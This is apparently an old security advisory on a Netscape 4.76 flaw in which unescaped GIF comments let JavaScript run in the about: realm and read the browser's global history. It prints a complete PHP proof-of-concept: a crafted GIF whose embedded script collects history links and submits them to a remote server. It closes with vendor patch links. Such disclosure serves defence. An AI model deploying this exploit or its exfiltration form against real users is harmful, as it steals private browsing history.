COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape prior to 4.77

PROBLEM

    Florian  Wesch  found  following.   The  Netscape browser does not
    escape the gif file comment  in the image information page.   This
    allows javascript execution in  the "about:" protocol and  can for
    example  be  used  to  upload  the  History  (about:global)  to  a
    webserver.

    Netscape  does  not  allow  javascript  to access documents from a
    different domain.   This stops a  javascript from one  domain that
    tries  to  mess  around  with  login forms/private data from other
    domain.  The following error message is shown

        "access disallowed from scripts at <javascriptdomain> to documents at another domain."

    Now there is the protocol  "about:" that is used for  some special
    tasks.

        about:          - shows Netscape version and copyrights
        about:blank     - shows a blank document
        about:config    - shows Browser configuration.
        about:global    - shows Information about the Netscape global history
        about:<url>     - shows Information about the specified url
        ..

    There are some other  about: documents (try grepping  the netscape
    binary).

    about:global is very interesting  since all visited documents  are
    listed there.   So Florian  tried to  find a  way to  access  this
    information.

    Florian created a frameset with 2 frames.  The first Frame (called
    foo)  contains  about:global.  Using  <frame  src="about:global">,
    <meta  http-equiv="refresh"  content="10;  URL=about:global">   or
    document.location.href="about.global";  for  setting  this url did
    not work.  So Florian used the following trick to make it work:

        <base href="about:">
        <form action="global" name="loadhistory">
            <input type="submit">
        </form>
        <script language="javascript">
            document.loadhistory.submit();
        </script>

    Intention is  that the  second frame  (called bar)  grabs 10  urls
    in the first frame using javascript and sends them to the server.

    Accessing parent.frames["foo"].document.links does not work  since
    foo is  displaying an  about: document  and bar  is a  normal http
    document:  "access disallowed from scripts at blah to documents.."

    So  he  tried  to  find  a  way  to  start  a javascript within an
    about: document.  about:<someurl> comes into mind since there  are
    a lot server specified values.

    First he tried to inject  javascript using the url of  the script.
    But since this url is encoded (space => %20 etc.) there is no  way
    in.   Modifying the  Content-Type (File  MIME Type)  did not  work
    either because Netscape opens a "Save as..." window when supplying
    an unknown mimetype.

    Netscape shows the  comment included in  gif files.   A quick test
    showed that  the comment  is not  escaped.   So Javascript  in gif
    comments is executed  in the about:  realm.  This  means that this
    script can then access the content of about:global.  Nice.

    The following  script included  in the  comment reads  10 urls  in
    the about:global frame (foo), stores them in the form and  finally
    submits this form.

        <form action=http://bla/ns476history.php target=_parent name=s method=get>
        <input name=u>
        </form>
        <script>
            f=parent.frames["foo"].document;
            l="";
            for(i=0;i<10;i++)
                l+=f.links[i]+"|";
            document.s.u.value=l;
            document.s.submit();
        </script>

    The  server  has  10  urls  of  about:global  urls now.  Accessing
    about:config should be possible too, but we did not try it.

    Exploit:

    <?
    /*
    Netscape 4.76 gif comment flaw

    Florian Wesch <fw@dividuum.de>
    http://dividuum.de
    */

    $self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
    if (strlen($self)>64) {
        echo "Url of $self is too long. 64 maximum.<br>";
        echo "You can change this but I think 64 should be enough for anybody ;-)";
        exit;
    }

    if (!isset($mode)) $mode="intro";

    // If urllist is submitted
    if (isset($u)) $mode="showhist";

    switch ($mode) {
        case "intro":
            ?>
            <html>
                <body>
                    <a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
                </body>
            </html>
            <?
            break;
        case "frameset":
            ?>
            <html>
                <frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
                    <frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
                    <frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
                </frameset>
            </html>
            <?
            break;
        case "loadhistory":
            // replaces the current document with about:global using javascript
            ?>
            <html>
                <base href="about:">
                <form action="global" name="loadhistory">
                    <input type="submit">
                </form>
                <script language="javascript">
                    document.loadhistory.submit();
                </script>
            </html>
            <?
            break;
        case "showimageinfo":
            ?>
            <html>
                <head>
                    <meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
                </head>
                <body>
                    Waiting 5 seconds...<br>
                    <img src="<? echo $self; ?>?mode=evilgif">
                </body>
            </html>
            <?
            break;
        case "evilgif":
            // Gifs are supposed to be compressed. The program I
            // used sucks :-)
            header("Content-type: image/gif");
            $gif ="4749463839610a000a00f70000ffffffffffccffff";
            $gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
            $gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
            $gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
            $gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
            $gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
            $gif.="fffffffffffffffffffffffffffffffffffffffffff";
            $gif.="fffffffffffffffffffffffffffffffffffffffffff";
            $gif.="fffffffffffffffffffffffffffffffffffffffffff";
            $gif.="ffffffffffffffffffffffff0000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="00000000000000021feff";
            $gif.=bin2hex(sprintf("%77s%s",

          /*"<form action=".$self,' target=_parent name=s method=get >'.*/
          /* I'm using POST so the submitted urls do not appear in the logfile */
            "<form action=".$self,' target=_parent name=s method=post>'.
                '<input name=u>'.
            '</form>'.
            '<script>'.
                'f=parent.frames["foo"].document;'.
                'l="";'.
              /*'for(i=0;i<f.links.length;i++)'.*/
                'for(i=0;i<10            ;i++)'.
                    'l+=f.links[i]+"|";'.
                'document.s.u.value=l;'.
                'document.'.chr(255).'s.submit();'.
            '</script>'));

            $gif.=              "00000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="0000000000000000000000000000000000000000000";
            $gif.="00000000000002c000000000a000a00000813004708";
            $gif.="1c48b0a0c18308132a5cc8b061c28000003b";
            echo pack("H".strlen($gif), $gif);
            break;
        case "showhist":
            $urls=explode("|",$u);
            echo "<h1>Top 10 urls in about:global</h1>";
            foreach ($urls as $url) {
                echo "<a href=$url>$url</a><br>";
            }
        };
    ?>

SOLUTION

    Disable Javascript or upgrade to 4.77.

    For RedHat:

        ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-4.77-0.6.2.src.rpm
        ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-alpha-4.77-0.6.2.src.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/netscape-common-4.77-0.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/netscape-communicator-4.77-0.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/netscape-navigator-4.77-0.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/netscape-common-4.77-0.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/netscape-communicator-4.77-0.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/netscape-navigator-4.77-0.6.2.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-4.77-1.src.rpm
        ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-alpha-4.77-1.src.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/netscape-common-4.77-1.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/netscape-communicator-4.77-1.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/alpha/netscape-navigator-4.77-1.alpha.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/netscape-common-4.77-1.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/netscape-communicator-4.77-1.i386.rpm
        ftp://updates.redhat.com/7.0/en/os/i386/netscape-navigator-4.77-1.i386.rpm

    For Immunix OS:

        http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-common-4.77-0.6.2_StackGuard.i386.rpm
        http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-communicator-4.77-0.6.2_StackGuard.i386.rpm
        http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-navigator-4.77-0.6.2_StackGuard.i386.rpm
        http://immunix.org/ImmunixOS/6.2/updates/SRPMS/netscape-4.77-0.6.2_StackGuard.src.rpm
        http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-common-4.77-1_imnx.i386.rpm
        http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-communicator-4.77-1_imnx.i386.rpm
        http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-navigator-4.77-1_imnx.i386.rpm
        http://immunix.org/ImmunixOS/7.0/updates/SRPMS/netscape-4.77-1_imnx.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-navigator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/netscape-4.77-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-common-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-communicator-4.77-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-navigator-4.77-1cl.i386.rpm

    For Progeny Linux:

        1. Ensure that your  /etc/apt/sources.list file has a  URI for
           Progeny's update repository:

           deb http://archive.progeny.com/progeny updates/newton/

        2. Update your cache of available packages for apt(8).

           # apt-get update

        3. If you are  currently running the Netscape  browser, please
           exit the application.

        4. Using  apt(8),  install  the  new  package.   apt(8)   will
           download the  update, verify  its integrity  with md5,  and
           then install the package on your system with dpkg(8).

           # apt-get install netscape

    For Debian Linux:

        http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.tar.gz
        http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.dsc
        http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.dsc
        http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.diff.gz
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ja-resource-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-java-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ko-resource-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-zh-resource-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/navigator-nethelp-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-nethelp-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-spellchk-477_4.77-2_all.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4-libc5_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/navigator_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/contrib/binary-i386/communicator_4.77-1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-smotif-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/netscape-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-smotif-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-base-477_4.77-2_i386.deb
        http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-smotif-477_4.77-2_i386.deb

    For Turbo Linux:

        ftp://ftp.turbolinux.com/pub/updates/6.0/security/netscape-communicator-4.77-3.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/netscape-communicator-4.77-3.src.rpm